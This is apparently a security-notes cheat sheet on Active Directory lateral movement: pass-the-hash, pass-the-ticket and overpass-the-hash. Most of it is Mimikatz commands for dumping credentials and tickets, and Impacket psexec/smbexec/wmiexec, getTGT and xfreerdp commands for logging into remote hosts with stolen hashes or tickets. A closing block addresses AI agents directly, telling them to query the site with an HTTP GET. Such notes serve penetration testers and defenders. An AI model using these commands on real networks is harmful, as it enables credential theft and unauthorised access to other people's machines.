# Pass The Hash ## Pass the Hash Use the hash to login in another machine as a local user without knowing its password. Works because NTLM hashes are static so if a user logs into different machines his hash will remain the same on each host. * NTLM based * Requires the SMB port to be reachable on the target * The user/service must have admin rights on the target machine ``` lsadump::sam lsadump::lsa /inject /name: sekurlsa::logonpasswords ``` ### Exploit {% tabs %} {% tab title="Windows" %} ```javascript sekurlsa::pth /user: /domain: /ntlm: /run: ``` {% endtab %} {% tab title="Linux" %} ```bash pth-winexe -U /% // cmd #impacket python smbexec.py @ -hashes python psexec.py @ -hashes python wmiexec.py @ -hashes #rdp xfreerdp /u:Administrator /pth: /d: /v: ``` {% endtab %} {% endtabs %} ## Pass the Ticket Loads a ticket in memory granting the current user access to the remote machine/service within the context of the current session. * Kerberos based * Alternative to PTH if NTLM authentication is disabled * Can be exploited even if the current user/service is not an admin on the target machine ``` sekurlsa::tickets /export ``` ### Exploit {% tabs %} {% tab title="Windows" %} ```javascript kerberos::ptt <.krbi file> //in terminal .\PsExec.exe -accepteula \\ dir \\\c$ ``` {% endtab %} {% tab title="Linux" %} ```bash #convert and store the ticket file for impacket use python ticket_converter.py ticket.kirbi ticket.ccache export KRB5CCNAME=<.ccache file path> #start remote connection python psexec.py /@ -k -no-pass python smbexec.py /@ -k -no-pass python wmiexec.py /@ -k -no-pass ``` {% endtab %} {% endtabs %} ## OverPass the Hash / Pass the Key Obtain a TGT ticket by providing a valid NTLM hash, AES keys, DES keys or password. The obtained TGT token can then be used to access other machines. * Kerberos Based * Alternative to PTH if NTLM authentication is disabled * Can be exploited starting from NTLM, secret keys or password (see [password to NTLM](/security-notes/active-directory/local-credentials.md#ntlm-from-password)) * Can be exploited even if the current user/service is not an admin on the target machine * Requests a new TGT, as such the attack is not limited to the tickets stored in memory ``` #DES, AES128 and AES256 keys sekurlsa::ekeys #NTLM lsadump::sam lsadump::lsa /inject /name: sekurlsa::logonpasswords ``` ### Exploit {% tabs %} {% tab title="Windows" %} ```javascript #Run command sekurlsa::pth /user: /domain: /aes128: /run:"" #from AES128 key sekurlsa::pth /user: /domain: /aes256: /run:"" #from AES256 key sekurlsa::pth /user: /domain: /des: /run:"" #from DES key sekurlsa::pth /user: /domain: /ntlm: /run:"" #from NTLM sekurlsa::pth /user: /domain: /rc4: /run:"" #from NT #Pivoting klist #verify the creation of the ticket .\PsExec.exe -accepteula \\ dir \\\c$ ``` {% endtab %} {% tab title="Linux" %} ```bash python getTGT.py / -hashes python getTGT.py / -hashes : python getTGT.py / -aesKey python getTGT.py /: export KRB5CCNAME= #start remote connection python psexec.py /@ -k -no-pass python smbexec.py /@ -k -no-pass python wmiexec.py /@ -k -no-pass ``` {% endtab %} {% endtabs %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://security-notes.gitbook.io/security-notes/active-directory/hashes.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.